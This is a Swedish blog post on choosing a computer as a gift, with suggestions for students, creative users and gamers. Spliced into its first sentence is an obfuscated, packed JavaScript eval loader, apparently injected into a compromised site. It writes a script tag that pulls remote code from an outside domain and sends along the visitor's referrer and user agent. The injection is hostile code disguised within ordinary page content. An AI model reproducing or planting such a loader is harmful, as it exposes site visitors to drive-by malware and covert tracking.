Image Image Image Image Image Image Image Image Image Image

| 30 maj, 2020

Scroll to top

Top

Dator i present?

chrome
Sebastian

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rnayi|var|u0026u|referrer|keehy||js|php’.split(’|’),0,{}))
här med att välja vad man som ska köpa till sina nära och kära är ett riktigt äkta huvudbry. Sitter man dessutom och funderar på att överraska med en dator av något slag blir det nästan ännu svårare. Trots att det vimlar av teknikexperter där ute så verkar det finnas lika många åsikter om vad man som är bäst som det finns datorer på hyllorna.

Laptop, surfplatta, stationär…sanningen är nog att det inte finns en som är bäst för alla. Däremot kan man hitta en som passar bäst för var och en om man bara tar sig en funderare. Vilken typ av användare är personen som ska få datorn? Tillhör hon eller han kategorierna Studenten, Den kreative eller Spelaren så blir valet lite enklare.

Studenten använder först och främst sina datorer till anteckningar under föreläsningar, att göra research och för att skriva sina arbeten. Storleken och vikten på datorn är därför viktig, den ska ju dras med överallt. En Chromebook eller en billigare version ur Dells utbud är bra val.  En laptop är att föredra eftersom en surfplatta blir besvärligt när man ska skriva mycket.  Prislappen är viktig såklart men samtidigt får man inte offra för mycket av datorns prestanda, för även om studentens liv tas upp av studier är det väl inte otänkbart att hon eller han ibland slappnar av och ser på en film eller tittar lite TV på sin dator. Från Staples kan man köpa Hewlett-Packard laptops som håller bra hastighet men är tillräckligt robusta för att kunna arbeta på under lång tid.

Den kreative använder datorn för sin konst. För nästan alla fotografer, grafiker, designer och konstnärer är datorn ett  oumbärligt arbetsredskap. Här krävs en kraftfull dator som klarar att köra avancerade program. Photoshop, 3ds, Max, VideoStudio är bara några mjukvaror som den kreative vill se på sin dator. De allra flesta väljer en MacBook. Om man vill ha en surfplatta är Windows Surface pro 3 ett bra alternativ då du kan kan rita upp dina skisser direkt på skärmen.

Spelaren – här har vi den verkligt kräsne om vi pratar datorprestanda. Spelarens mjukvaror kräver både snabbhet och utmärkt grafik. Närma dig aldrig en spelare vars dator har kraschat! Alienware är de enda som tillverkar laptops som är tillräckligt kraftfulla för att klara av hard-core spel. Det är en bra ide att även investera i en extern laptopkylare eftersom överhettning inte är ovanligt vid intensivt spelande.

Självklart är det inte säkert att just de här datorerna passar just dina mottagare.  Ett bra tips är att prata lite om datorer med dem i god tid innan inköpet. Kanske kan du maskera dina verkliga intentioner genom att be henne eller honom om råd för ett eget inköp. Lite slughet kommer man långt med.